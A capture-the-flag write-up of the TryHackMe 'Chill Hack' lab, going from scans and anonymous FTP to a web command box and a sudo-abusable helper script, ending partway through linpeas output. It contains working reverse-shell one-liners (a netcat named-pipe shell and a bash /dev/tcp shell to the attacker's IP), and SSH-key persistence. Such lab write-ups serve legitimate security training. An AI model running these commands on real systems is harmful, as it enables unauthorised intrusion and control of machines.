TryHackMe: Chill Hack Write Up
TryHackMe: Chill Hack https://tryhackme.com/room/chillhack
Enumeration
Lets fireup rust scan
$ rustscan -a chill -- -sC -sV -A -oA chill -v
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.128.82:22
Open 10.10.128.82:21
Open 10.10.128.82:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-25 19:19 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:19
Completed NSE at 19:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:19
Completed NSE at 19:19, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:19
Completed NSE at 19:19, 0.00s elapsed
Initiating Ping Scan at 19:19
Scanning 10.10.128.82 [2 ports]
Completed Ping Scan at 19:19, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 19:19
Scanning chill (10.10.128.82) [3 ports]
Discovered open port 80/tcp on 10.10.128.82
Discovered open port 22/tcp on 10.10.128.82
Discovered open port 21/tcp on 10.10.128.82
Completed Connect Scan at 19:19, 0.03s elapsed (3 total ports)
Initiating Service scan at 19:19
Scanning 3 services on chill (10.10.128.82)
Completed Service scan at 19:19, 6.12s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.128.82.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:19
NSE: [ftp-bounce 10.10.128.82:21] PORT response: 500 Illegal PORT command.
Completed NSE at 19:19, 1.20s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:19
Completed NSE at 19:19, 0.23s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:19
Completed NSE at 19:19, 0.00s elapsed
Nmap scan report for chill (10.10.128.82)
Host is up, received syn-ack (0.031s latency).
Scanned at 2020-11-25 19:19:04 GMT for 7s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 04:33 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.5.198
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcxgJ3GDCJNTr2pG/lKpGexQ+zhCKUcUL0hjhsy6TLZsUE89P0ZmOoQrLQojvJD0RpfkUkDfd7ut4//Q0Gqzhbiak3AIOqEHVBIVcoINja1TIVq2v3mB6K2f+sZZXgYcpSQriwN+mKgIfrKYyoG7iLWZs92jsUEZVj7sHteOq9UNnyRN4+4FvDhI/8QoOQ19IMszrbpxQV3GQK44xyb9Fhf/Enzz6cSC4D9DHx+/Y1Ky+AFf0A9EIHk+FhU0nuxBdA3ceSTyu8ohV/ltE2SalQXROO70LMoCd5CQDx4o1JGYzny2SHWdKsOUUAkxkEIeEVXqa2pehJwqs0IEuC04sv
| 256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFetPKgbta+pfgqdGTnzyD76mw/9vbSq3DqgpxPVGYlTKc5MI9PmPtkZ8SmvNvtoOp0uzqsfe71S47TXIIiQNxQ=
| 256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKHq62Lw0h1xzNV41zO3BsfpOiBI3uy0XHtt6TOMHBhZ
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 7EEEA719D1DF55D478C68D9886707F17
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:19
Completed NSE at 19:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:19
Completed NSE at 19:19, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:19
Completed NSE at 19:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.62 seconds
22 - SSH
We do not have a username/password yet so we will put this on the back burner
21 - FTP
Anonymous FTP is enabled
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 04:33 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.5.198
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
So lets have a look around :)
$ ftp chill
Connected to chill.
220 (vsFTPd 3.0.3)
Name (chill:tj): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 115 4096 Oct 03 04:33 .
drwxr-xr-x 2 0 115 4096 Oct 03 04:33 ..
-rw-r--r-- 1 1001 1001 90 Oct 03 04:33 note.txt
226 Directory send OK.
ftp>
We have a note.txt
so download it and have a look inside
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (90 bytes).
226 Transfer complete.
90 bytes received in 0.00 secs (33.3931 kB/s)
ftp> exit
221 Goodbye.
$ cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
hmmm, so we have some filtering on strings, when we look at HTTP on port 80 we need to keep this in mind.
80 - HTTP
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 7EEEA719D1DF55D478C68D9886707F17
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Let's take a quick look at the webpage
Nothing that interesting in the source of the webpage so lets have a click around.
Foothold
Looking around the webpage nothing really jumps out. Login/Register is not functional and neither is search...
Testing the contact form we get a POST
request so this actually looks like it is working.... can we do anything here? Lets fire up burp and capture the request.
POST /contact.html HTTP/1.1
Host: chill
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 20
Origin: http://chill
Connection: close
Referer: http://chill/contact.html
email=email%40me.com
Hmmmm, only the email address is being sent ..... anyway lets have a look if we can do anything....
Playing around with the contact form didnt get me anywhere but running nikto
I found a secert directory
$ nikto -url http://chill
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.128.82
+ Target Hostname: chill
+ Target Port: 80
+ Start Time: 2020-11-25 19:34:40 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 8970, size: 56d7e303a7e80, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7681 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2020-11-25 19:40:22 (GMT0) (342 seconds)
---------------------------------------------------------------------------
Looks like we have command box :) Let try our usual reverse shell
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.5.198 4444 >/tmp/f
Success!!!
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.9.5.198] from (UNKNOWN) [10.10.128.82] 42186
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
$ ls /usr/bin/py*
/usr/bin/py3clean
/usr/bin/py3compile
/usr/bin/py3versions
/usr/bin/pydoc3
/usr/bin/pydoc3.6
/usr/bin/pygettext3
/usr/bin/pygettext3.6
/usr/bin/pyhtmlizer3
/usr/bin/pyjwt3
/usr/bin/python3
/usr/bin/python3-jsondiff
/usr/bin/python3-jsonpatch
/usr/bin/python3-jsonpointer
/usr/bin/python3-jsonschema
/usr/bin/python3.6
/usr/bin/python3.6m
/usr/bin/python3m
$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/secret$ export TERM=xterm
export TERM=xterm
www-data@ubuntu:/var/www/html/secret$ ^Z
[1]+ Stopped nc -lvnp 4444
$ stty raw -echo; fg
nc -lvnp 4444
www-data@ubuntu:/var/www/html/secret$
www-data@ubuntu:/var/www/html/secret$
User Flag
Looking around /home
we have 2 directories we can not get into and 1 we can
www-data@ubuntu:/var/www/html/secret$ ls /home/a
anurodh/ apaar/ aurick/
www-data@ubuntu:/var/www/html/secret$ ls /home/anurodh/
ls: cannot open directory '/home/anurodh/': Permission denied
www-data@ubuntu:/var/www/html/secret$ ls /home/apaar/
.bash_history .bashrc .gnupg/ .profile .viminfo
.bash_logout .cache/ .helpline.sh .ssh/ local.txt
www-data@ubuntu:/var/www/html/secret$ ls /home/aurick/
ls: cannot open directory '/home/aurick/': Permission denied
www-data@ubuntu:/var/www/html/secret$
Lets take a look at local.txt
$ cat /home/apaar/local.txt
cat: /home/apaar/local.txt: Permission denied
or not :(
Ok, lets check if we can run sudo
www-data@ubuntu:/var/www/html/secret$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
Ok, so we can run helpline.sh
with out a password as apaar
.. lets take a look at it
$ ls -l /home/apaar/.helpline.sh && cat /home/apaar/.helpline.sh
-rwxrwxr-x 1 apaar apaar 286 Oct 4 14:11 /home/apaar/.helpline.sh
#!/bin/bash
echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo
read -p "Enter the person whom you want to talk with: " person
read -p "Hello user! I am $person, Please enter your message: " msg
$msg 2>/dev/null
echo "Thank you for your precious time!"
Ok, so it asks for a name and message, looking at it person is thrown away bit $msg
is run as a command and redirected to /dev/null
.... this looks promising..
www-data@ubuntu:/tmp$ sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
Enter the person whom you want to talk with: m
Hello user! I am m, Please enter your message: /bin/bash /tmp/shell.sh
Boom, we are in
$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.9.5.198] from (UNKNOWN) [10.10.128.82] 54036
apaar@ubuntu:/tmp$
apaar@ubuntu:/tmp$ cd /home ap
cd /home/apaar/
apaar@ubuntu:~$ ls
ls
local.txt
apaar@ubuntu:~$ cat local.txt
cat local.txt
{USER-FLAG: [REDACTED]}
Priv Esc
Ok, again we run that the script with sudo but as we do not have the password for apaar
we can not run sudo
apaar@ubuntu:~$ sudo -l
Matching Defaults entries for apaar on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User apaar may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
apaar@ubuntu:~$ id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
apaar@ubuntu:~$ ls -l /home/apaar/.helpline.sh
-rwxrwxr-x 1 apaar apaar 286 Oct 4 14:11 /home/apaar/.helpline.sh
apaar@ubuntu:~$ vi /home/apaar/.helpline.sh
apaar@ubuntu:~$ sudo /home/apaar/.helpline.sh
[sudo] password for apaar:
Sorry, try again.
[sudo] password for apaar:
sudo: 1 incorrect password attempt
Ok, lets drop our ssh public key in authorized_keys
incase we need to get back in. Now lets grab linpeas.sh
and look for a privesc ...
apaar@ubuntu:~$ sh linpeas.sh | tee log
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
linpeas v2.5.6 by carlospolop
ADVISORY: linpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 99% a PE vector
RED: You must take a look at it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMangeta: Your username
====================================( Basic information )=====================================
OS: Linux version 4.15.0-118-generic (buildd@lgw01-amd64-039) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020
User & Groups: uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
Hostname: ubuntu
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . DONE
====================================( System Information )====================================
[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.15.0-118-generic (buildd@lgw01-amd64-039) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020
Distributor ID: Ubuntu
Description: Ubuntu 18.04.5 LTS
Release: 18.04
Codename: bionic
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.21p2
[+] PATH
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#usdpath
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
[+] Date
Wed Nov 25 20:08:05 UTC 2020
[+] System stats
Filesystem Size Used Avail Use% Mounted on
udev 965M 0 965M 0% /dev
tmpfs 200M 640K 199M 1% /run
/dev/mapper/ubuntu--vg-ubuntu--lv 19G 4.7G 13G 27% /
tmpfs 996M 0 996M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 996M 0 996M 0% /sys/fs/cgroup
/dev/xvda2 976M 77M 832M 9% /boot
tmpfs 200M 0 200M 0% /run/user/1001
total used free shared buff/cache available
Mem: 2038988 381096 904892 2200 753000 1488012
Swap: 0 0 0
[+] Environment
[i] Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
MAIL=/var/mail/apaar
USER=apaar
SSH_CLIENT=10.9.5.198 44708 22
SHLVL=1
HOME=/home/apaar
SSH_TTY=/dev/pts/2
LOGNAME=apaar
_=/bin/sh
XDG_SESSION_ID=2
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
SSH_CONNECTION=10.9.5.198 44708 10.10.128.82 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
HISTFILE=/dev/null
[+] Looking for Signature verification failed in dmseg
Not Found
[+] selinux enabled? .............. sestatus Not Found
[+] Printer? ...................... lpstat Not Found
[+] Is this a container? .......... No
[+] Is ASLR enabled? .............. Yes
=========================================( Devices )==========================================
[+] Any sd* disk in /dev? (limit 20)
[+] Unmounted file-system?
[i] Check if you can mount umounted devices
/dev/disk/by-id/dm-uuid-LVM-UvW9VThk4wInNNaOv0mExXKp2FJf7WIBVWe6weapEmKRPpjfhzMYYLC0O4gGeoPs / ext4 defaults 0 0
/dev/disk/by-uuid/1e4eecdf-0441-42c4-beb5-eac62c8eb3c4 /boot ext4 defaults 0 0
====================================( Available Software )====================================
[+] Useful software
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl
/bin/ping
/usr/bin/base64
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/perl
/usr/bin/php
/usr/bin/sudo
/usr/bin/docker
[+] Installed Compiler
/usr/share/gcc-8
================================( Processes, Cron, Services, Timers & Sockets )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
apaar 1953 0.0 0.0 9920 1196 pts/0 S 20:01 0:00 /bin/bash /home/apaar/.helpline.sh
apaar 1954 0.0 0.0 9920 1136 pts/0 S 20:01 0:00 /bin/bash /tmp/shell.sh
apaar 1955 0.0 0.0 9920 1164 pts/0 S 20:01 0:00 /bin/bash -c bash -i >& /dev/tcp/10.9.5.198/4455 0>&1
apaar 1956 0.0 0.2 19728 4740 pts/0 S 20:01 0:00 bash -i
apaar 1970 0.0 0.4 37288 9316 pts/0 S+ 20:03 0:00 python3 -c import pty;pty.spawn("/bin/bash")
apaar 1971 0.0 0.2 19732 4760 pts/1 Ss+ 20:03 0:00 /bin/bash
apaar 2017 0.0 0.3 76688 7720 ? Ss 20:06 0:00 /lib/systemd/systemd --user
apaar 2019 0.0 0.1 193804 2516 ? S 20:06 0:00 (sd-pam)
apaar 2167 0.0 0.2 108104 4208 ? S 20:06 0:00 sshd: apaar@pts/2
apaar 2172 0.0 0.2 21460 5396 pts/2 Ss 20:06 0:00 -bash
apaar 2198 0.0 0.1 4968 2184 pts/2 S+ 20:07 0:00 sh linpeas.sh
apaar 2199 0.0 0.0 6180 796 pts/2 S+ 20:07 0:00 tee log
apaar 2678 0.0 0.1 38372 3728 pts/2 R+ 20:08 0:00 ps aux
apaar 2680 0.0 0.0 14712 1012 pts/2 S+ 20:08 0:00 sort
daemon 917 0.0 0.1 28332 2468 ? Ss 19:17 0:00 /usr/sbin/atd -f
message+ 866 0.0 0.2 50056 4544 ? Ss 19:17 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
mysql 1088 0.0 8.6 1162008 177072 ? Sl 19:17 0:01 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
root 1 0.1 0.4 159824 9072 ? Ss 19:17 0:03 /sbin/init auto automatic-ubiquity noprompt
root 1017 0.0 0.8 333740 17032 ? Ss 19:17 0:00 /usr/sbin/apache2 -k start
root 1152 0.0 3.9 754444 80912 ? Ssl 19:17 0:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 1952 0.0 0.1 60576 3804 pts/0 S 20:01 0:00 sudo -u apaar /home/apaar/.helpline.sh
root 2091 0.5 1.3 171488 26816 ? Sl 20:06 0:00 /usr/bin/python3 /usr/lib/ubuntu-release-upgrader/check-new-release -q
root 406 0.0 0.6 94888 13520 ? S<s 19:17 0:00 /lib/systemd/systemd-journald
root 429 0.0 0.0 105904 1836 ? Ss 19:17 0:00 /sbin/lvmetad -f
root 436 0.0 0.2 46980 5904 ? Ss 19:17 0:00 /lib/systemd/systemd-udevd
root 907 0.0 0.2 70612 6040 ? Ss 19:17 0:00 /lib/systemd/systemd-logind
root 923 0.0 0.3 286244 6948 ? Ssl 19:17 0:00 /usr/lib/accountsservice/accounts-daemon
root 929 0.0 0.8 169096 17260 ? Ssl 19:17 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 931 0.0 1.3 654568 27148 ? Ssl 19:17 0:00 /usr/bin/amazon-ssm-agent
root 937 0.0 0.1 30028 3176 ? Ss 19:17 0:00 /usr/sbin/cron -f
root 941 0.0 0.0 613228 1744 ? Ssl 19:17 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 951 0.0 0.1 29148 2932 ? Ss 19:17 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root 953 0.1 2.2 764292 46196 ? Ssl 19:17 0:03 /usr/bin/containerd
root 961 0.0 0.9 185948 20024 ? Ssl 19:17 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 969 0.0 0.3 291452 7284 ? Ssl 19:17 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 970 0.0 0.1 14664 2344 ttyS0 Ss+ 19:17 0:01 /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
root 982 0.0 0.0 14888 1984 tty1 Ss+ 19:17 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 998 0.0 0.3 72304 6564 ? Ss 19:17 0:00 /usr/sbin/sshd -D
syslog 947 0.0 0.2 263036 4480 ? Ssl 19:17 0:00 /usr/sbin/rsyslogd -n
systemd+ 629 0.0 0.1 141956 3396 ? Ssl 19:17 0:00 /lib/systemd/systemd-timesyncd
systemd+ 747 0.0 0.2 80080 5280 ? Ss 19:17 0:00 /lib/systemd/systemd-networkd
systemd+ 764 0.0 0.2 70792 5364 ? Ss 19:17 0:00 /lib/systemd/systemd-resolved
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
www-data 1038 0.0 0.5 338564 11872 ? S 19:17 0:00 /usr/sbin/apache2 -k start
www-data 1039 0.0 0.5 338360 10592 ? S 19:17 0:00 /usr/sbin/apache2 -k start
www-data 1040 0.0 0.5 338360 10632 ? S 19:17 0:00 /usr/sbin/apache2 -k start
www-data 1042 0.0 0.5 338368 10664 ? S 19:17 0:00 /usr/sbin/apache2 -k start
www-data 1046 0.0 0.5 338384 10684 ? S 19:17 0:00 /usr/sbin/apache2 -k start
www-data 1689 0.0 0.5 338360 10656 ? S 19:19 0:00 /usr/sbin/apache2 -k start
www-data 1725 0.0 0.5 338352 10584 ? S 19:25 0:00 /usr/sbin/apache2 -k start
www-data 1726 0.0 0.6 338568 13008 ? S 19:25 0:00 /usr/sbin/apache2 -k start
www-data 1727 0.0 0.7 338576 14576 ? S 19:25 0:00 /usr/sbin/apache2 -k start
www-data 1728 0.0 0.6 338584 14160 ? S 19:25 0:00 /usr/sbin/apache2 -k start
www-data 1838 0.0 0.0 4628 776 ? S 19:49 0:00 sh -c mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.5.198 4444 >/tmp/f
www-data 1840 0.0 0.0 4672 820 ? S 19:49 0:00 cat /tmp/f
www-data 1841 0.0 0.0 4628 816 ? S 19:49 0:00 /bin/sh -i
www-data 1842 0.0 0.1 15716 2164 ? S 19:49 0:00 nc 10.9.5.198 4444
www-data 1844 0.0 0.4 37292 9412 ? S 19:50 0:00 /usr/bin/python3 -c import pty;pty.spawn("/bin/bash")
www-data 1845 0.0 0.1 18616 3496 pts/0 Ss 19:50 0:00 /bin/bash
[+] Binary processes permissions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
1.1M -rwxr-xr-x 1 root root 1.1M Jun 6 2019 /bin/bash
0 lrwxrwxrwx 1 root root 4 Aug 6 22:35 /bin/sh -> dash
1.6M -rwxr-xr-x 1 root root 1.6M Jul 8 18:59 /lib/systemd/systemd
128K -rwxr-xr-x 1 root root 127K Jul 8 18:59 /lib/systemd/systemd-journald
216K -rwxr-xr-x 1 root root 215K Jul 8 18:59 /lib/systemd/systemd-logind
1.6M -rwxr-xr-x 1 root root 1.6M Jul 8 18:59 /lib/systemd/systemd-networkd
372K -rwxr-xr-x 1 root root 371K Jul 8 18:59 /lib/systemd/systemd-resolved
40K -rwxr-xr-x 1 root root 39K Jul 8 18:59 /lib/systemd/systemd-timesyncd
572K -rwxr-xr-x 1 root root 571K Jul 8 18:59 /lib/systemd/systemd-udevd
56K -rwxr-xr-x 1 root root 56K Sep 16 18:43 /sbin/agetty
0 lrwxrwxrwx 1 root root 20 Jul 8 18:59 /sbin/init -> /lib/systemd/systemd
84K -rwxr-xr-x 1 root root 83K Jan 23 2020 /sbin/lvmetad
30M -rwxr-xr-x 1 root root 30M Aug 11 00:34 /usr/bin/amazon-ssm-agent
51M -rwxr-xr-x 1 root root 51M Sep 9 15:40 /usr/bin/containerd
232K -rwxr-xr-x 1 root root 232K Jun 11 18:25 /usr/bin/dbus-daemon
98M -rwxr-xr-x 1 root root 98M Sep 16 17:01 /usr/bin/dockerd
20K -rwxr-xr-x 1 root root 19K Mar 31 2020 /usr/bin/lxcfs
0 lrwxrwxrwx 1 root root 9 Oct 25 2018 /usr/bin/python3 -> python3.6
180K -rwxr-xr-x 1 root root 179K Dec 18 2017 /usr/lib/accountsservice/accounts-daemon
